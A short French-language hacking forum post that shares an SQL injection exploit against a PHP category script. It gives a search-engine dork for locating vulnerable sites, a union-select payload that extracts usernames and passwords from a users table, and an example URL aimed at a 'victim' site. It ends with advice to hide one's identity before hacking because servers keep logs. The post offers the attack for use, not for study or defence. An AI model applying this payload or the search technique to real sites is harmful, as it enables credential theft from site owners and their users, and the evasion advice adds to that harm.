c'est mon premier seujet ds ce forum :
type de faille : SQL injection
chercher ds internet : allinurl: "showCat.php?cat_id"
date de publication : [2008-03-21] ;)
EXPLOIT :
showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
exemple :
http://www.victime.com/showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
bonne exploit mais rester prudent car a mon avis avant de pratiquer hack il faut savoir comment cacher votre identité ds le net ;) car il y tjrs log.file
merci a tous
je cherche des amis pour l'echange d'information
\\___________I'm Not A Hacker__________________//
\\___________I'm just a Man Of Security __________________//
\\___________megharba tal moooooootttttttt_____________///